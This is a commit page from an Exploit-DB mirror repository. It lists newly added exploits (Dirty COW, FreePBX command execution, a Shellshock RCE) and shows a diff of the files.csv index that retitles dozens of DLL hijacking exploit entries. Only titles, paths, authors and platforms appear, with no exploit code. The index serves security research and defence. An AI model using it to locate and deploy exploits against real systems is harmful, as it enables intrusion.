bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-10-22

Browse source 
7 new exploits

RealSecure / Blackice - iss_pam1.dll Remote Overflow
RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow

Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit
Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking

Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit
Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking
uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit
uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking
Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking
Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit
Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit
Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)
Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)
TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit
Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit
Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking
Opera 10.61 - 'dwmapi.dll' DLL Hijacking
Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL
TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking
Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking
Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking
Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking
TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking
BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit
Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit
BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking
Adobe Dreamweaver CS5 11.0 build 4909 -  'mfc90loc.dll' DLL Hijacking
Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking

Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit
Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking

VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit
VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit
Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit
Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit
Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit
Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking
Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking
InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking
Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking
Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking
Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking
Microsoft Group Convertor - 'imm.dll' DLL Hijacking
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit
MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)
Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit
TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking
MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking
Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit
Nvidia Driver - DLL Hijacking Exploit (nview.dll)
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit
Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit
Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking
Nvidia Driver -  'nview.dll' DLL Hijacking
Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking
Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking
Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking
Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking
Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit
Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)
Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)
CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)
Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit
Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)
Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit
Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking
Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking
Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking
Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking
Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking
Adobe Extension Manager CS5 5.0.298 -  'dwmapi.dll' DLL Hijacking
Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking
CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking
Corel PHOTO-PAINT X3 13.0.0.576 -  'crlrib.dll' DLL Hijacking
Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking
Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking
Google Earth 5.1.3535.3218 -  'quserex.dll' DLL Hijacking
Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking

Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit
Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking

Microsoft Edge - Array.map Heap Overflow (MS16-119)
Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)

Microsoft Edge - Array.join Info Leak (MS16-119)
Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)

Adobe Flash - Transform.colorTranform Getter Info Leak
Adobe Flash - Transform.colorTranform Getter Infomation Leak
Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)
Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)
Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)
Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)
Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Info Leak (MS16-119)
Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)
Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)
Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)
Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)
Microsoft Edge - Function.apply Infomation Leak (MS16-119)
Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)
Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' Race Condition Privilege Escalation (Write Access)
Just Dial Clone Script - SQL Injection
FreePBX 10.13.66 - Remote Command Execution / Privilege Escalation
RealPlayer 18.1.5.705 - '.QCP' Crash (PoC)
Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' Race Condition Privilege Escalation (SUID)
Oracle VM VirtualBox 4.3.28 - '.ovf' Crash (PoC)
TrendMicro InterScan Web Security Virtual Appliance - Remote Code Execution (Shellshock)
This commit is contained in:
Offensive Security 2016-10-22 05:01:17 +00:00
parent 07fdc778ee
commit 506182d72d
8 changed files with 815 additions and 64 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

135
files.csv
View file

@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port
165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow",2004-03-28,Sam,windows,remote,0
168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
@ -12896,67 +12896,67 @@ id,file,description,date,author,platform,type,port
14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0
14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0
14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0
14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",2010-08-24,TheLeader,windows,local,0
14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit",2010-08-25,Secfence,windows,local,0
14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit",2010-08-25,anonymous,windows,local,0
14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,windows,local,0
14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0
14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0
14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14769,platforms/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0
14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0
14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0
14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit",2010-08-25,"Mohamed Clay",windows,local,0
14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0
14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local,0
14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit",2010-08-25,"xsploited security",windows,local,0
14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
